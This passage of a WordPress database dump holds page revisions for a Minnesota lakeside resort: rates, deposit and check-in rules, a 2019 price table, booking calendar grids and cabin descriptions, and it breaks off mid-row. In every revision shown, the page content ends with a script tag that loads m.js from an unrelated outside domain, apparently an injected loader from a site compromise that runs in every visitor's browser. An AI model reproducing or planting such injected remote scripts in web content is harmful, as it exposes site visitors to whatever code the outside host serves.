widget_sow-editor\" data-index=\"2\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	<p>ALL Cabins and Motel rooms are NON smoking !!</p>\n<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less  All Daytime (Not Overnight) Guests $5.00 each  Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.<br />\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION.  ALL DEPOSITS ARE NON-REFUNDABLE.</p>\n<p>A 3% PROCESSING FEE WILL BE ADDED FOR ALL CREDIT AND DEBIT CARD USAGE.</p>\n<p>CHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !!  CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!<br />\nPets on a leash are welcome in all campsites ( 2 pets per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND.  Call to set up reservations for Hunting and Ice fishing.</p>\n</div>\n</div></div><div id=\"panel-43-0-0-3\" class=\"so-panel widget widget_sow-editor panel-last-child\" data-index=\"3\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	[table id=2 /]</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2019-08-03 06:29:59','2019-08-03 11:29:59','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(895,3,'2019-08-09 10:21:51','2019-08-09 15:21:51','[[\"2019\",\"Bedrooms\",\"Weekday Nightly\",\"Weekend Holiday Nightly\",\"Weekly Sept. \\u2013 May\",\"Weekly June \\u2013 Aug.\",\"Maximum Capacity\"],[\"Sleepers Motel\",\"1\",\"$90.\",\"$100.00\",\"$450.00\",\"$550.00\",\"4\\n\"],[\"Kitchenettes Motel\",\"1\",\"$110.00\",\"$130.00\",\"$600.00\",\"$700.00\",\"4\"],[\"Suite 9\",\"2\",\"$200.00\",\"$230.00\",\"$1000.00\",\"$1,175.00\",\"4\"],[\"Cabins (#10 #11 #12)\",\"2\",\"$200.00\",\"$230.00\",\"$1000.00\",\"$1,175.00\",\"8\"],[\"Cabins (#13 #14)\",\"2\",\"$220.00\",\"$250.00\",\"$1,100.00\",\"$1,275.00\",\"8\"],[\"Camping non-electric\",\"1 per site\",\"$35.00\",\"$35.00\",\"$180.00\",\"$180.00\",\"\"],[\"Camping with electric\",\"1\\u00a0 per site\\n\",\"$45.00\",\"$45.00\",\"$250.00\",\"$250.00\",\"\"],[\"Drive Thru sites, elec, water and sewer\",\"1 per site\",\"$60.00\",\"$60.00\",\"$300.00\",\"$300.00\",\"\"],[\"Pets (two pets per campsite)\",\"\",\"$10.00/ Pet\",\"$10.00/ Pet\",\"$50.00/ Pet\",\"$50.00/ Pet\",\"\"],[\"Pet in Cabins or Motel rooms\",\"\",\"$25.00/ Pet\",\"$25.00/ Pet\",\"$125.00/ Pet\",\"$125.00/ Pet\",\"\"],[\"Additional People Camping (Each)\",\"\",\"$5.00\",\"$5.00\",\"$25.00\\n\",\"$25.00\\n\",\"\"],[\"Additional People in Motel and Cabins (Each)\",\"\",\"$25.00\",\"$25.00\",\"$125.00\\n\",\"$125.00\\n\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','2019 Rates','Call us at 218-747-2959 for reservations  \nNO checkins after 10:00 PM !!\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  Balance is due upon arrival.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nAll Guests must check in upon arrival. \nWireless Internet Available','inherit','closed','closed','','679-revision-v1','','','2019-08-09 10:21:51','2019-08-09 15:21:51','',679,'http://ashbyresort.com/679-revision-v1/',0,'revision','',0),(896,3,'2019-08-15 15:23:45','2019-08-15 20:23:45','[[\"\",\"8/17-8/23\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8/24-8/30\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8/31-9/6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9/7-9/13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9/14-9/20\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\"],[\"KITCHEN 1\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"SLEEPER 2\",\"2\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 3\",\"3\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"3\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 4\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"4\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 5\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"SLEEPER 6\",\"6\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"6\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"6\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\"],[\"KITCHEN 7\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"VILLA 9\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN 10\",\"10\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"10\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 11\",\"11\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"11\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"11\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"11\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"X\"],[\"CABIN 12\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"12\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 13\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"13\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 14\",\"14\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"14\",\"X\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"14\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"14\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"14\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-08-15 15:23:45','2019-08-15 20:23:45','',835,'http://ashbyresort.com/835-revision-v1/',0,'revision','',0),(897,3,'2019-08-21 18:45:48','2019-08-21 23:45:48','[[\"\",\"8/24-8/30\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8/31-9/6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9/7-9/13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9/14-9/20\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9/14-9/20\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\"],[\"KITCHEN 1\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"1\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"SLEEPER 2\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 3\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"3\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"3\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 4\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"4\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 5\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"5\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 6\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"6\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"6\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"6\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 7\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"7\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"VILLA 9\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"9\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 10\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"10\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN 11\",\"11\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"11\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"11\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"11\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 12\",\"12\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"12\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"12\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 13\",\"13\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"13\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"13\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 14\",\"14\",\"X\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"14\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"14\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"14\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"14\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-08-21 18:45:48','2019-08-21 23:45:48','',835,'http://ashbyresort.com/835-revision-v1/',0,'revision','',0),(898,3,'2019-08-21 18:48:05','2019-08-21 23:48:05','[[\"\",\"8/24-8/30\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8/31-9/6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9/7-9/13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9/14-9/20\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9/21-9/27\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\"],[\"KITCHEN 1\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"1\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"SLEEPER 2\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 3\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"3\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"3\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 4\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"4\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 5\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"5\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 6\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"6\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"6\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"6\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 7\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"7\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"VILLA 9\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"9\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 10\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"10\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN 11\",\"11\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"11\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"11\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"11\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 12\",\"12\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"12\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"12\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 13\",\"13\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"13\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"13\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 14\",\"14\",\"X\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"14\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"14\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"14\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"14\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-08-21 18:48:05','2019-08-21 23:48:05','',835,'http://ashbyresort.com/835-revision-v1/',0,'revision','',0);
INSERT INTO `ar_posts` VALUES (899,3,'2019-08-28 17:19:44','2019-08-28 22:19:44','<h2>We are now taking reservations for next summer !!</h2><p><strong>Love to stay at a Cabin - <a href=\"http://ashbyresort.com/calendar/\">Call us at 218-747-2959 to book it</a></strong></p><p>Cabins are available weekly only  (Saturday to Saturday) during June and July. There are a few weeks still available for 2019.</p><p><strong>Our motel and cabins are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets. <a href=\"http://ashbyresort.com/campground-map/\">(see map)</a></strong></p>		\n			<h2>Cabin 10</h2>		\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-001.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-001.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Carly-001-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n		<p><strong>2 bedroom , 1 bath</strong></p><p><strong>2 queen beds, 1 double bed, 1 futon</strong></p><p><strong>Sleeps 8</strong></p>		\n			<h2>Cabin 11</h2>		\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/cabin11.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/cabin11.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/cabin11-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n		<p><strong>2 bedroom, 1 bath</strong></p><p><strong> 2 queen beds, 1 double bed, 1 futon</strong></p><p><strong>Sleeps 8</strong></p>		\n			<h2>Cabin 12</h2>		\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/Carly-008-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/Carly-008-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/Carly-008-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/Carly-008-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<p><strong>Remodeled in 2016       2 bedroom 1 bath</strong></p><p><strong> 1 queen bed, 2 twin beds, 1 hide-a-bed,</strong></p><p><strong>Sleeps 6</strong></p>		\n										<img width=\"319\" height=\"241\" src=\"http://ashbyresort.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-09-at-8.38.01-PM.png\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-09-at-8.38.01-PM.png 319w, http://ashbyresort.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-09-at-8.38.01-PM-300x227.png 300w\" sizes=\"(max-width: 319px) 100vw, 319px\" />											\n		<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.</strong></p>		\n										<img width=\"320\" height=\"243\" src=\"http://ashbyresort.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-09-at-8.38.10-PM.png\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-09-at-8.38.10-PM.png 320w, http://ashbyresort.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-09-at-8.38.10-PM-300x228.png 300w\" sizes=\"(max-width: 320px) 100vw, 320px\" />											\n		<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.</strong></p>		\n										<img width=\"291\" height=\"221\" src=\"http://ashbyresort.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-09-at-8.38.17-PM.png\" alt=\"\" />											\n		<p><br /><strong>Done in knotty pine has air conditioning, full kitchen and bathtub</strong></p>		\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Cabin1011interior02.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Cabin1011interior02.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Cabin1011interior02-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Cabin12interior.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Cabin12interior.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Cabin12interior-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3948-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3948-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3948-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3948-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" /><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Cabins','','inherit','closed','closed','','789-revision-v1','','','2019-08-28 17:19:44','2019-08-28 22:19:44','',789,'http://ashbyresort.com/789-revision-v1/',0,'revision','',0),(900,3,'2019-08-28 17:21:45','2019-08-28 22:21:45','<h2>Now booking for next summer !!!</h2><h3>Love to stay in a Newer Cabin – <a href=\"http://ashbyresort.com/calendar/\">Call us to book it 218-747-2959</a></h3><p><strong>#13</strong></p><p>This is one of the newer cabins located on the swimming beach. It is a 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom. Enjoy looking over the lake sitting at the breakfast bar or on the deck. There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.</p>		\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC05132-1-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC05132-1-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSC05132-1-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSC05132-1-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3946-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3946-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3946-300x225.jpg 300w, 